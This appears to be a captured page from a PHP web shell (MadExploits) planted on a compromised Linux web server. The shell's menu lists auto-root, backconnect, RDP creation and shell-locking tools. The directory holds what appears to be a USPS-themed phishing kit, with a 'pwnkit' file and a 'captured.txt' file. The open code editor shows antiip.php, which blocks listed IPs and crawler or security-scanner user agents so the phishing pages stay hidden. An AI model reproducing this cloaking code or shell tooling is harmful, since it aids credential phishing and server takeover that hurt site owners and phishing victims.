Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.226.200.180
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
jandsahib /
myadmin /
pdf /
usps /
[ HOME SHELL ]
Name
Size
Permission
Action
checking
[ DIR ]
drwxr-xr-x
killbot
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Redsys.php
19.2
KB
-rw-r--r--
antiip.php
1.89
KB
-rw-r--r--
captured.txt
460
B
-rw-r--r--
index.php
5.46
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
306
B
-rw-r--r--
useragent.php
1.93
KB
-rw-r--r--
usps2023.zip
516.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : antiip.php
<?php error_reporting(0); $IP_Connected = $_SERVER['REMOTE_ADDR']; $deny = array( "188.166.98.249", "188.127.188.247", "70.32.0.141", ); if(in_array($IP_Connected,$deny)){ header('HTTP/1.0 404 Not Found'); exit(); } $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']); $blocked_words = array(" 'Googlebot', 'facebookexternalhit/1.1', 'Baiduspider', 'ia_archiver', 'bingbot', 'R6_FeedFetcher', 'NetcraftSurveyAgent', 'Sogou web spider', 'bingbot', 'Yahoo! Slurp', 'facebookexternalhit', 'PrintfulBot', 'msnbot', 'Twitterbot', 'UnwindFetchor', 'urlresolver', 'Butterfly', 'TweetmemeBot', 'PaperLiBot', 'MJ12bot', 'AhrefsBot', 'Exabot', 'Ezooms', 'YandexBot', 'SearchmetricsBot', 'picsearch', 'TweetedTimes Bot', 'QuerySeekerSpider', 'ShowyouBot', 'woriobot', 'merlinkbot', 'BazQuxBot', 'Kraken', 'SISTRIX Crawler', 'R6_CommentReader', 'magpie-crawler', 'GrapeshotCrawler', 'PercolateCrawler', 'MaxPointCrawler', 'R6_FeedFetcher', 'NetSeer crawler', 'grokkit-crawler', 'SMXCrawler', 'PulseCrawler', 'Y!J-BRW', '80legs.com/webcrawler', 'Mediapartners-Google', 'Spinn3r', 'InAGist', 'Python-urllib', 'NING', 'TencentTraveler', 'Feedfetcher-Google', 'mon.itor.us', 'spbot', 'Feedly', 'bot', 'curl', spider, crawler"); foreach($blocked_words as $word) { if (substr_count($hostname, $word) > 0) { header("HTTP/1.0 404 Not Found"); die("<h1>404 Not Found</h1>The page that you have requested could not be found."); } } ?>
Close